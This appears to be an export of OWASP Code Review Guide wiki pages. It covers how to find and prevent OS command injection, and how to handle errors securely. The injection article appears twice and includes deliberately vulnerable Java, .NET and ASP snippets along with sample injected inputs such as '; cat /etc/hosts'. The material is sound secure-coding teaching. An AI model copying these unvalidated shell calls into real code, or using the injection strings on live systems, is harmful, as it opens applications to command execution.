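    // Counts imports of communication-related packages in .java files under root.
    public static int countSuspectImports(Path root) throws IOException {
        int[] hits = { 0 };
        try (var paths = Files.walk(root)) {
            paths.filter(p -> p.toString().endsWith(".java")).forEach(p -> {
                try {
                    String src = Files.readString(p);
                    for (String pkg : SUSPECTS) {
                        if (src.contains("import " + pkg)) {
                            hits[0]++;
                        }
                    }
                } catch (IOException e) {
                    // unreadable file: skip it
                }
            });
        }
        return hits[0];
    }

    public static void main(String[] args) throws IOException {
        Path root = Paths.get(args.length > 0 ? args[0] : ".");
        System.out.println(countSuspectImports(root) + " suspect imports found");
    }
}
```

Each hit is only a starting point for review, not a finding in itself.&lt;br /&gt;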
&lt;br /&gt;
== Vulnerable Patterns for OS Injection ==&lt;br /&gt;
What we should be looking for are relationships between the application and the operating system: places where the application utilises functions of the underlying operating system. &lt;br /&gt;
&lt;br /&gt;
In Java, this is done using the Runtime object, '''java.lang.Runtime'''.&lt;br /&gt;
In .NET calls such as '''System.Diagnostics.Process.Start '''are used to call underlying OS functions. &lt;br /&gt;
In PHP we may look for calls such as '''exec()''' or '''passthru()'''.&lt;br /&gt;
&lt;br /&gt;
'''Example''':&lt;br /&gt;
&lt;br /&gt;
We have a class that eventually gets input from the user via an HTTP request. This class is used to execute a native exe on the application server and return a result. &lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
     public void executeCommand(String userName) {&lt;br /&gt;
         try {&lt;br /&gt;
             String myUid = userName;&lt;br /&gt;
             Runtime rt = Runtime.getRuntime();&lt;br /&gt;
             rt.exec(&amp;quot;'''''cmd.exe /C''''' doStuff.exe -&amp;quot; + myUid); // Call exe with userID&lt;br /&gt;
         } catch (Exception e) {&lt;br /&gt;
             e.printStackTrace();&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The method executeCommand calls '''''doStuff.exe''''' (utilizing cmd.exe) via the '''''java.lang.Runtime''''' static method '''''getRuntime()'''''. The parameter passed is not validated in any way in this class. We are assuming that the data has not been validated prior to calling this method. ''Transactional analysis should have encountered any data validation prior to this point.''&lt;br /&gt;
Inputting “Joe69” would result in the following MS DOS command:&lt;br /&gt;
&lt;br /&gt;
'''''doStuff.exe -Joe69'''''&lt;br /&gt;
&lt;br /&gt;
Let's say we input '''''Joe69 &amp;amp; netstat -a'''''. We would then observe the following:&lt;br /&gt;
&lt;br /&gt;
The exe doStuff would execute, passing in the user ID Joe69, but then the DOS command '''''netstat''''' would also be executed. This works because the &amp;amp; character is a command separator (appender) in MS DOS, so the command after the &amp;amp; character is executed as well. &lt;br /&gt;
&lt;br /&gt;
This would not be true if the code above were written as follows (here we assume that '''''doStuff.exe''''' does not itself act as a command interpreter, the way cmd.exe or /bin/sh does):&lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
     public void executeCommand(String userName) {&lt;br /&gt;
         try {&lt;br /&gt;
             String myUid = userName;&lt;br /&gt;
             Runtime rt = Runtime.getRuntime();&lt;br /&gt;
             rt.exec(&amp;quot;doStuff.exe -&amp;quot; + myUid); // Call exe with userID&lt;br /&gt;
         } catch (Exception e) {&lt;br /&gt;
             e.printStackTrace();&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Why? From the [http://java.sun.com/j2se/1.5.0/docs/api/java/lang/Runtime.html Java 2 documentation]:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'' ... More precisely, the given command string is broken into tokens using a StringTokenizer created by the call new StringTokenizer(command) with no further modification of the character categories. The tokens produced by the tokenizer are then placed in the new string array cmdarray, in the same order ... ''&lt;br /&gt;
&lt;br /&gt;
The produced array contains the executable to call (the first item) and its arguments (the remaining items). So, unless the first item called is an application which itself parses and interprets its arguments, and in turn calls other external applications based on them, it would not be possible to execute '''''netstat''''' in the above code snippet. Such a first item would be '''''cmd.exe''''' on Windows boxes or '''''sh''''' on Unix-like boxes.&lt;br /&gt;
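The tokenization point can be sketched in code. With the array form of exec (or ProcessBuilder), the attacker-controlled value remains a single argument and is never re-tokenized by a shell; doStuff.exe and the "-" prefix are carried over from the example above:

```java
class SafeInvocation {
    /** Builds the argv array for the array form of Runtime.exec or
        ProcessBuilder: the user value stays one argument, never shell-parsed. */
    static String[] buildCommand(String userName) {
        return new String[] { "doStuff.exe", "-" + userName };
    }

    public static void main(String[] args) {
        String[] cmd = buildCommand("Joe69 & netstat -a");
        // The entire injected string is still a single argv element;
        // no shell ever sees the '&' character.
        System.out.println(cmd.length); // 2
        System.out.println(cmd[1]);     // -Joe69 & netstat -a
        // To actually run it: new ProcessBuilder(cmd).start();
    }
}
```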
&lt;br /&gt;
Most out-of-the-box source code/assembly analyzers will (and some won't!) flag a ''Command Execution'' issue when they encounter the dangerous APIs '''''System.Diagnostics.Process.Start''''' and '''''java.lang.Runtime.exec'''''. Obviously, though, the calculated risk should differ. In the first example a true &amp;quot;command injection&amp;quot; exists, whereas in the second, without any validation or escaping, what can be called an &amp;quot;argument injection&amp;quot; vulnerability exists. The risk is still there, but the severity depends on the command being called. So, the issue needs analysis. &lt;br /&gt;
&lt;br /&gt;
===UNIX===&lt;br /&gt;
&lt;br /&gt;
An attacker might insert the string '''“; cat /etc/hosts”''' and the contents of the UNIX hosts file might be exposed to the attacker if the command is executed through a shell such as /bin/bash or /bin/sh. &lt;br /&gt;
&lt;br /&gt;
===.NET Example===&lt;br /&gt;
 namespace ExternalExecution&lt;br /&gt;
 {&lt;br /&gt;
 class CallExternal&lt;br /&gt;
 {&lt;br /&gt;
 static void Main(string[] args)&lt;br /&gt;
 {&lt;br /&gt;
 string arg1 = args[0];&lt;br /&gt;
 System.Diagnostics.Process.Start(&amp;quot;doStuff.exe&amp;quot;, arg1);&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Yet again there is no data validation to speak of here, assuming that there is no upstream validation occurring in another class. &lt;br /&gt;
&lt;br /&gt;
===Classic ASP Example===&lt;br /&gt;
 &amp;lt;pre&amp;gt;&lt;br /&gt;
 &amp;lt;% &lt;br /&gt;
   option explicit&lt;br /&gt;
   dim wshell&lt;br /&gt;
   set wshell = CreateObject(&amp;quot;WScript.Shell&amp;quot;) &lt;br /&gt;
   wshell.run &amp;quot;c:\file.bat &amp;quot; &amp;amp; Request.Form(&amp;quot;Args&amp;quot;)&lt;br /&gt;
   set wshell = nothing &lt;br /&gt;
 %&amp;gt;&lt;br /&gt;
 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
These attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to backend databases via SQL (i.e. SQL injection). Complete scripts written in Perl, Python, shell, bat, and other languages can be injected into poorly designed web applications and executed.&lt;br /&gt;
&lt;br /&gt;
==Good Patterns &amp;amp; procedures to prevent OS injection==&lt;br /&gt;
&lt;br /&gt;
See the Data Validation section.&lt;br /&gt;
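As a minimal taste of what that section covers, an allow-list check on the user ID from the earlier examples might look like this (the permitted pattern is an assumption about valid user IDs, not a rule from this guide):

```java
import java.util.regex.Pattern;

class UserIdValidator {
    // Assumed format: 3-16 letters or digits. Adjust to real requirements.
    private static final Pattern USER_ID = Pattern.compile("^[A-Za-z0-9]{3,16}$");

    /** Allow-list validation: reject anything not matching the known-good form. */
    static boolean isValidUserId(String candidate) {
        return candidate != null && USER_ID.matcher(candidate).matches();
    }

    public static void main(String[] args) {
        System.out.println(isValidUserId("Joe69"));              // true
        System.out.println(isValidUserId("Joe69 & netstat -a")); // false
    }
}
```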
&lt;br /&gt;
==Related Articles==&lt;br /&gt;
[[Command Injection]]&lt;br /&gt;
&lt;br /&gt;
[[Interpreter Injection]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
[[Category:Input Validation]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Reviewing_Code_for_OS_Injection&amp;diff=60235</id>
		<title>Reviewing Code for OS Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Reviewing_Code_for_OS_Injection&amp;diff=60235"/>
				<updated>2009-05-06T17:14:51Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Introduction */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Injection flaws allow attackers to pass malicious code through a web application to another subsystem. Depending on the subsystem, different types of injection attacks can be performed: &lt;br /&gt;
&lt;br /&gt;
RDBMS: SQL injection&amp;lt;br&amp;gt;&lt;br /&gt;
Web browser/App server: script injection (XSS)&amp;lt;br&amp;gt;&lt;br /&gt;
OS shell: operating system commands (calling external applications from your application).&lt;br /&gt;
&lt;br /&gt;
OS Commanding is one of the attack classes that fall into [http://www.webappsec.org/projects/threat/classes/os_commanding.shtml Injection Flaws]. In other classifications, it is placed in the [http://www.fortify.com/vulncat/index.html Input Validation and Representation] category, the [[Top_10_2007-A2|OS Commanding]] threat class, or defined as the [http://cwe.mitre.org/data/definitions/77.html Failure to Sanitize Data into Control Plane] weakness and the [http://capec.mitre.org/data/definitions/6.html Argument Injection] attack pattern. OS Commanding happens when an application accepts untrusted/insecure input and passes it to external applications (either as the application name itself or as arguments) without validation or proper escaping.&lt;br /&gt;
&lt;br /&gt;
==How to Locate the Potentially Vulnerable code ==&lt;br /&gt;
Many developers believe text fields are the only areas for data validation. This is an incorrect assumption. Any external input must be data validated: &lt;br /&gt;
&lt;br /&gt;
Text fields, list boxes, radio buttons, check boxes, cookies, HTTP header data, HTTP POST data, hidden fields, parameter names and parameter values. … This is not an exhaustive list. &lt;br /&gt;
&lt;br /&gt;
“Process to process” or “entity-to-entity” communication must be investigated also. Any code that communicates with an upstream or downstream process and accepts input from it must be reviewed. &lt;br /&gt;
&lt;br /&gt;
All injection flaws are input-validation errors. The presence of an injection flaw indicates that data received from an external source was not correctly validated before crossing the boundary of trust, a boundary that grows more blurred every year. &lt;br /&gt;
&lt;br /&gt;
For this type of vulnerability, we need to find all input streams into the application. These can come from a user’s browser, a CLI, or a fat client, but also from upstream processes that “feed” our application. &lt;br /&gt;
&lt;br /&gt;
An example would be to search the code base for the use of APIs or packages that are normally used for communication purposes. &lt;br /&gt;
&lt;br /&gt;
The '''java.io''', '''java.sql''', '''java.net''', '''java.rmi''', '''javax.xml''' packages are all used for application communication. Searching for methods from those packages in the code base can yield results. A less “scientific” method is to search for common keywords such as “UserID”, “LoginID” or “Password”.&lt;br /&gt;
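As a rough sketch of automating that search (the class and keyword list below are illustrative, not part of any standard tool), a reviewer could flag suspect lines programmatically:

```java
import java.util.List;

class DangerousApiScanner {
    // Illustrative keyword list; extend it for your own code base.
    static final List<String> DANGEROUS =
            List.of("Runtime.getRuntime", ".exec(", "ProcessBuilder");

    /** Returns true if a source line references a command-execution API. */
    static boolean isSuspicious(String sourceLine) {
        for (String needle : DANGEROUS) {
            if (sourceLine.contains(needle)) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        System.out.println(isSuspicious("Runtime rt = Runtime.getRuntime();")); // true
        System.out.println(isSuspicious("int total = a + b;"));                 // false
    }
}
```

Each hit is only a lead for manual review, not a confirmed finding.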
&lt;br /&gt;
== Vulnerable Patterns for OS Injection ==&lt;br /&gt;
What we should be looking for are relationships between the application and the operating system, i.e. the application utilising functions of the underlying operating system. &lt;br /&gt;
&lt;br /&gt;
In Java this is done using the Runtime object, '''java.lang.Runtime'''.&lt;br /&gt;
In .NET calls such as '''System.Diagnostics.Process.Start '''are used to call underlying OS functions. &lt;br /&gt;
In PHP we may look for calls such as '''exec()''' or '''passthru()'''.&lt;br /&gt;
&lt;br /&gt;
'''Example''':&lt;br /&gt;
&lt;br /&gt;
We have a class that eventually gets input from the user via an HTTP request. This class is used to execute a native exe on the application server and return a result. &lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
     public void executeCommand(String userName) {&lt;br /&gt;
         try {&lt;br /&gt;
             String myUid = userName;&lt;br /&gt;
             Runtime rt = Runtime.getRuntime();&lt;br /&gt;
             rt.exec(&amp;quot;'''''cmd.exe /C''''' doStuff.exe -&amp;quot; + myUid); // Call exe with userID&lt;br /&gt;
         } catch (Exception e) {&lt;br /&gt;
             e.printStackTrace();&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The method executeCommand calls '''''doStuff.exe''''' (utilizing cmd.exe) via the '''''java.lang.Runtime''''' static method '''''getRuntime()'''''. The parameter passed is not validated in any way in this class. We are assuming that the data has not been validated prior to calling this method. ''Transactional analysis should have encountered any data validation prior to this point.''&lt;br /&gt;
Inputting “Joe69” would result in the following MS DOS command:&lt;br /&gt;
&lt;br /&gt;
'''''doStuff.exe -Joe69'''''&lt;br /&gt;
&lt;br /&gt;
Let's say we input '''''Joe69 &amp;amp; netstat -a'''''. We would then observe the following:&lt;br /&gt;
&lt;br /&gt;
The exe doStuff would execute, passing in the user ID Joe69, but then the DOS command '''''netstat''''' would also be executed. This works because the &amp;amp; character is a command separator (appender) in MS DOS, so the command after the &amp;amp; character is executed as well. &lt;br /&gt;
&lt;br /&gt;
This would not be true if the code above were written as follows (here we assume that '''''doStuff.exe''''' does not itself act as a command interpreter, the way cmd.exe or /bin/sh does):&lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
     public void executeCommand(String userName) {&lt;br /&gt;
         try {&lt;br /&gt;
             String myUid = userName;&lt;br /&gt;
             Runtime rt = Runtime.getRuntime();&lt;br /&gt;
             rt.exec(&amp;quot;doStuff.exe -&amp;quot; + myUid); // Call exe with userID&lt;br /&gt;
         } catch (Exception e) {&lt;br /&gt;
             e.printStackTrace();&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Why? From the [http://java.sun.com/j2se/1.5.0/docs/api/java/lang/Runtime.html Java 2 documentation]:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'' ... More precisely, the given command string is broken into tokens using a StringTokenizer created by the call new StringTokenizer(command) with no further modification of the character categories. The tokens produced by the tokenizer are then placed in the new string array cmdarray, in the same order ... ''&lt;br /&gt;
&lt;br /&gt;
The produced array contains the executable to call (the first item) and its arguments (the remaining items). So, unless the first item called is an application which itself parses and interprets its arguments, and in turn calls other external applications based on them, it would not be possible to execute '''''netstat''''' in the above code snippet. Such a first item would be '''''cmd.exe''''' on Windows boxes or '''''sh''''' on Unix-like boxes.&lt;br /&gt;
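The tokenization point can be sketched in code. With the array form of exec (or ProcessBuilder), the attacker-controlled value remains a single argument and is never re-tokenized by a shell; doStuff.exe and the "-" prefix are carried over from the example above:

```java
class SafeInvocation {
    /** Builds the argv array for the array form of Runtime.exec or
        ProcessBuilder: the user value stays one argument, never shell-parsed. */
    static String[] buildCommand(String userName) {
        return new String[] { "doStuff.exe", "-" + userName };
    }

    public static void main(String[] args) {
        String[] cmd = buildCommand("Joe69 & netstat -a");
        // The entire injected string is still a single argv element;
        // no shell ever sees the '&' character.
        System.out.println(cmd.length); // 2
        System.out.println(cmd[1]);     // -Joe69 & netstat -a
        // To actually run it: new ProcessBuilder(cmd).start();
    }
}
```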
&lt;br /&gt;
Most out-of-the-box source code/assembly analyzers will (and some won't!) flag a ''Command Execution'' issue when they encounter the dangerous APIs '''''System.Diagnostics.Process.Start''''' and '''''java.lang.Runtime.exec'''''. Obviously, though, the calculated risk should differ. In the first example a true &amp;quot;command injection&amp;quot; exists, whereas in the second, without any validation or escaping, what can be called an &amp;quot;argument injection&amp;quot; vulnerability exists. The risk is still there, but the severity depends on the command being called. So, the issue needs analysis. &lt;br /&gt;
&lt;br /&gt;
===UNIX===&lt;br /&gt;
&lt;br /&gt;
An attacker might insert the string '''“; cat /etc/hosts”''' and the contents of the UNIX hosts file might be exposed to the attacker if the command is executed through a shell such as /bin/bash or /bin/sh. &lt;br /&gt;
&lt;br /&gt;
===.NET Example===&lt;br /&gt;
 namespace ExternalExecution&lt;br /&gt;
 {&lt;br /&gt;
 class CallExternal&lt;br /&gt;
 {&lt;br /&gt;
 static void Main(string[] args)&lt;br /&gt;
 {&lt;br /&gt;
 string arg1 = args[0];&lt;br /&gt;
 System.Diagnostics.Process.Start(&amp;quot;doStuff.exe&amp;quot;, arg1);&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Yet again there is no data validation to speak of here, assuming that there is no upstream validation occurring in another class. &lt;br /&gt;
&lt;br /&gt;
===Classic ASP Example===&lt;br /&gt;
 &amp;lt;pre&amp;gt;&lt;br /&gt;
 &amp;lt;% &lt;br /&gt;
   option explicit&lt;br /&gt;
   dim wshell&lt;br /&gt;
   set wshell = CreateObject(&amp;quot;WScript.Shell&amp;quot;) &lt;br /&gt;
   wshell.run &amp;quot;c:\file.bat &amp;quot; &amp;amp; Request.Form(&amp;quot;Args&amp;quot;)&lt;br /&gt;
   set wshell = nothing &lt;br /&gt;
 %&amp;gt;&lt;br /&gt;
 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
These attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to backend databases via SQL (i.e. SQL injection). Complete scripts written in Perl, Python, shell, bat, and other languages can be injected into poorly designed web applications and executed.&lt;br /&gt;
&lt;br /&gt;
==Good Patterns &amp;amp; procedures to prevent OS injection==&lt;br /&gt;
&lt;br /&gt;
See the Data Validation section.&lt;br /&gt;
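As a minimal taste of what that section covers, an allow-list check on the user ID from the earlier examples might look like this (the permitted pattern is an assumption about valid user IDs, not a rule from this guide):

```java
import java.util.regex.Pattern;

class UserIdValidator {
    // Assumed format: 3-16 letters or digits. Adjust to real requirements.
    private static final Pattern USER_ID = Pattern.compile("^[A-Za-z0-9]{3,16}$");

    /** Allow-list validation: reject anything not matching the known-good form. */
    static boolean isValidUserId(String candidate) {
        return candidate != null && USER_ID.matcher(candidate).matches();
    }

    public static void main(String[] args) {
        System.out.println(isValidUserId("Joe69"));              // true
        System.out.println(isValidUserId("Joe69 & netstat -a")); // false
    }
}
```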
&lt;br /&gt;
==Related Articles==&lt;br /&gt;
[[Command Injection]]&lt;br /&gt;
&lt;br /&gt;
[[Interpreter Injection]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
[[Category:Input Validation]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Codereview-Error-Handling&amp;diff=60156</id>
		<title>Codereview-Error-Handling</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Codereview-Error-Handling&amp;diff=60156"/>
				<updated>2009-05-05T12:11:40Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Web.config */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
==Error Handling==&lt;br /&gt;
Error Handling is important in a number of ways. It may affect the state of the application or leak system information to a user. The initial failure that causes the error may push the application into an insecure state. Weak error handling also aids the attacker, as the errors returned may assist them in constructing correct attack vectors. A generic error page for most errors is recommended when developing code. This approach makes it more difficult for attackers to identify signatures of potentially successful attacks. Keep in mind, however, that there are methods which can circumvent even leading-practice error handling: attacks such as blind SQL injection, using booleanization or response-time characteristics, can still extract information despite such generic responses. &lt;br /&gt;
&lt;br /&gt;
The other key area relating to error handling is the premise of &amp;quot;fail securely&amp;quot;. Errors induced should not leave the application in an insecure state. Resources should be locked down and released, sessions terminated (if required), and calculations or business logic should be halted (depending on the type of error, of course). &lt;br /&gt;
&lt;br /&gt;
An important aspect of secure application development is to prevent information leakage. Error messages give an attacker great insight into the inner workings of an application. &lt;br /&gt;
&lt;br /&gt;
''The purpose of reviewing the Error Handling code is to assure that the application fails safely under all possible error conditions, expected and unexpected. No sensitive information is presented to the user when an error occurs. ''&lt;br /&gt;
&lt;br /&gt;
For example, SQL injection is much tougher to execute successfully without some helpful error messages. Suppressing them lessens the attack footprint, and an attacker would have to resort to “blind SQL injection”, which is more difficult and time consuming. &lt;br /&gt;
&lt;br /&gt;
A well-planned error/exception handling strategy is important for three reasons:&lt;br /&gt;
&lt;br /&gt;
#	Good error handling does not give an attacker any information that can serve as a means to attack the application&lt;br /&gt;
#	A proper centralised error strategy is easier to maintain and reduces the chance of any uncaught errors “Bubbling up” to the front end of an application.&lt;br /&gt;
#	Information leakage can lead to social engineering exploits.&lt;br /&gt;
&lt;br /&gt;
Some development languages provide checked exceptions: the compiler will complain if an exception for a particular API call is not caught. Java is a good example of this. Languages like C, C++, and C# do not provide this safety net. Even languages with checked exceptions are still prone to information leakage, as not all types of errors are checked for. &lt;br /&gt;
&lt;br /&gt;
When an exception or error is thrown, we also need to log this occurrence. Sometimes this is due to bad development, but it can be the result of an attack or some other service your application relies on failing. &lt;br /&gt;
&lt;br /&gt;
All code paths that can cause an exception to be thrown should check for success so that the exception is not thrown in the first place. &lt;br /&gt;
&lt;br /&gt;
* To avoid a NullPointerException, check that the object being accessed is not null. &lt;br /&gt;
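For instance, the null check above can be sketched as (a contrived illustration):

```java
class NullGuard {
    /** Checks for null before dereferencing, so no NullPointerException
        is ever thrown for a missing value. */
    static int safeLength(String s) {
        return (s == null) ? 0 : s.length();
    }

    public static void main(String[] args) {
        System.out.println(safeLength(null));  // 0
        System.out.println(safeLength("abc")); // 3
    }
}
```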
&lt;br /&gt;
===Error Handling Should Be Centralized if Possible===&lt;br /&gt;
&lt;br /&gt;
When reviewing code, it is recommended that you assess the commonality within the application from an error/exception handling perspective. Frameworks provide error handling resources which can be leveraged to assist in secure programming, and such resources within the framework should be reviewed to assess if the error handling is &amp;quot;wired up&amp;quot; correctly. &lt;br /&gt;
&lt;br /&gt;
* A generic error page should be used for all exceptions if possible. &lt;br /&gt;
&lt;br /&gt;
This prevents the attacker from identifying internal responses to error states. This also makes it more difficult for automated tools to identify successful attacks.&lt;br /&gt;
&lt;br /&gt;
'''Declarative Exception Handling'''&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;exception   key=&amp;quot;bank.error.nowonga&amp;quot;&lt;br /&gt;
                    path=&amp;quot;/NoWonga.jsp&amp;quot;&lt;br /&gt;
                    type=&amp;quot;mybank.account.NoCashException&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This could be found in the struts-config.xml file, a key file when reviewing the wired-up Struts environment.&lt;br /&gt;
&lt;br /&gt;
===Java Servlets and JSP===&lt;br /&gt;
&lt;br /&gt;
Unhandled exceptions can be dealt with via configuration in web.xml. When an exception occurs but is not caught in code, the user is forwarded to a generic error page: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;error-page&amp;gt;&lt;br /&gt;
       &amp;lt;exception-type&amp;gt;UnhandledException&amp;lt;/exception-type&amp;gt;&lt;br /&gt;
       &amp;lt;location&amp;gt;GenericError.jsp&amp;lt;/location&amp;gt;&lt;br /&gt;
 &amp;lt;/error-page&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Also in the case of HTTP 404 or HTTP 500 errors during the review you may find: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;error-page&amp;gt;&lt;br /&gt;
  &amp;lt;error-code&amp;gt;500&amp;lt;/error-code&amp;gt;&lt;br /&gt;
  &amp;lt;location&amp;gt;GenericError.jsp&amp;lt;/location&amp;gt;&lt;br /&gt;
 &amp;lt;/error-page&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Failing Securely===&lt;br /&gt;
Types of errors:&lt;br /&gt;
*The result of business logic conditions not being met.&lt;br /&gt;
*The result of the environment wherein the business logic resides fails.&lt;br /&gt;
*The result of upstream or downstream systems upon which the application depends fail.&lt;br /&gt;
*Technical hardware / physical failure.&lt;br /&gt;
&lt;br /&gt;
Failures are never expected, but they do occur. In the event of a failure, it is important not to leave the &amp;quot;doors&amp;quot; of the application open and the keys to other &amp;quot;rooms&amp;quot; within the application sitting on the table. In the course of a logical workflow, which is designed based upon requirements, errors may occur which can be programmatically handled, such as a connection pool not being available or a downstream server not being contactable. &lt;br /&gt;
&lt;br /&gt;
Such areas of failure should be examined during the course of the code review. Verify that all resources are released in the case of a failure, and that there is no potential for resource leakage along the thread of execution (resources being memory, connection pools, file handles, etc.). &lt;br /&gt;
&lt;br /&gt;
The review of code should also include pinpointing areas where the user session should be terminated or invalidated. Sometimes errors may occur which do not make any logical sense from a business logic perspective or a technical standpoint; &lt;br /&gt;
&lt;br /&gt;
e.g: &amp;quot;A logged in user looking to access an account which is not registered to that user and such data could not be inputted in the normal fashion.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Such conditions reflect possible malicious activity. Here we should review if the code is in any way defensive and kills the user’s session object and forwards the user to the login page. (Keep in mind that the session object should be examined upon every HTTP request).&lt;br /&gt;
&lt;br /&gt;
===Information Burial===&lt;br /&gt;
Swallowing exceptions in an empty catch block is not advised, as the audit trail of the cause of the exception would be incomplete.&lt;br /&gt;
&lt;br /&gt;
==Generic Error Messages==&lt;br /&gt;
We should use a localized description string in every exception, a friendly error reason such as “System Error – Please try again later”. When the user sees an error message, it will be derived from this description string of the exception that was thrown, and never from the exception class which may contain a stack trace, line number where the error occurred, class name, or method name. &lt;br /&gt;
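A minimal Java sketch of this pattern (the message text and method below are illustrative): the caller only ever sees the friendly description, while the exception's internals stay server-side:

```java
class SafeErrors {
    /** Returns the generic, user-facing message; internal details (class
        name, stack trace) are logged server-side, never shown. */
    static String handle(Exception e) {
        // In real code: write e and its stack trace to a server-side log here.
        return "System Error - Please try again later";
    }

    public static void main(String[] args) {
        try {
            throw new IllegalStateException("internal: db node 3 down");
        } catch (Exception e) {
            String shown = handle(e);
            System.out.println(shown);
            System.out.println(shown.contains("db node")); // false: nothing leaked
        }
    }
}
```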
&lt;br /&gt;
Do not expose sensitive information in exception messages. Information such as paths on the local file system is considered privileged information; any internal system information should be hidden from the user. As mentioned before, an attacker could use this information to gather private user information from the application or components that make up the app. &lt;br /&gt;
&lt;br /&gt;
Don’t put people’s names or any internal contact information in error messages. Don’t put any “human” information, which would lead to a level of familiarity and a social engineering exploit.&lt;br /&gt;
&lt;br /&gt;
==How to Locate the Potentially Vulnerable Code==&lt;br /&gt;
&lt;br /&gt;
===JAVA===&lt;br /&gt;
In Java we have the concept of an error object: the Exception object. This lives in the java.lang package and is derived from the Throwable object. Exceptions are thrown when an abnormal condition occurs. Another object derived from Throwable is the Error object, which is thrown when something more serious occurs. &lt;br /&gt;
&lt;br /&gt;
Information leakage can occur when developers use some exception methods, which ‘bubble’ to the user UI due to a poor error handling strategy. The methods are as follows: &lt;br /&gt;
&lt;br /&gt;
printStackTrace()&amp;lt;br&amp;gt;&lt;br /&gt;
getStackTrace()&lt;br /&gt;
&lt;br /&gt;
Also important to know is that the output of these methods goes to the system console, just as System.out.println(e) does for an Exception e. Be sure not to redirect this output to the JSP's PrintWriter object (by convention called &amp;quot;out&amp;quot;), e.g. printStackTrace(out); &lt;br /&gt;
&lt;br /&gt;
Another object to look at is the java.lang.System class:&lt;br /&gt;
&lt;br /&gt;
setErr() and the System.err field.&lt;br /&gt;
&lt;br /&gt;
===.NET===&lt;br /&gt;
In .NET a System.Exception object exists, and commonly used child objects such as ApplicationException and SystemException derive from it. It is not recommended that you throw or catch a SystemException; these are thrown by the runtime. &lt;br /&gt;
&lt;br /&gt;
When an error occurs, either the system or the currently executing application reports it by throwing an exception containing information about the error, similar to Java. Once thrown, an exception is handled by the application or by the default exception handler. This Exception object contains similar methods to the Java implementation such as: &lt;br /&gt;
&lt;br /&gt;
StackTrace &amp;lt;br&amp;gt;&lt;br /&gt;
Source &amp;lt;br&amp;gt;&lt;br /&gt;
Message &amp;lt;br&amp;gt;&lt;br /&gt;
HelpLink &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In .NET we need to look at the error handling strategy from the point of view of global error handling and the handling of unexpected errors. This can be done in many ways and this article is not an exhaustive list. Firstly, an Error Event is thrown when an unhandled exception is thrown. &lt;br /&gt;
&lt;br /&gt;
This is part of the TemplateControl class. &lt;br /&gt;
&lt;br /&gt;
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemWebUITemplateControlClassErrorTopic.asp&lt;br /&gt;
&lt;br /&gt;
Error handling can be done in three ways in .NET&lt;br /&gt;
&lt;br /&gt;
*In the web.config file's customErrors section. &lt;br /&gt;
*In the global.asax file's Application_Error sub. &lt;br /&gt;
*On the aspx or associated codebehind page in the Page_Error sub&lt;br /&gt;
&lt;br /&gt;
The order of error handling events in .NET is as follows: &lt;br /&gt;
#	On the Page in the Page_Error sub.&lt;br /&gt;
#	The global.asax Application_Error sub &lt;br /&gt;
#	The web.config file &lt;br /&gt;
&lt;br /&gt;
It is recommended to look in these areas to understand the error strategy of the application.&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
Unlike Java and .NET, classic ASP pages do not have structured try-catch error handling; instead they have a specific object called &amp;quot;err&amp;quot;. This makes error handling in classic ASP pages hard to do and prone to design errors in error handlers, causing race conditions and information leakage. Also, as ASP uses VBScript (a subset of Visual Basic), statements like &amp;quot;On Error GoTo label&amp;quot; are not available.&lt;br /&gt;
&lt;br /&gt;
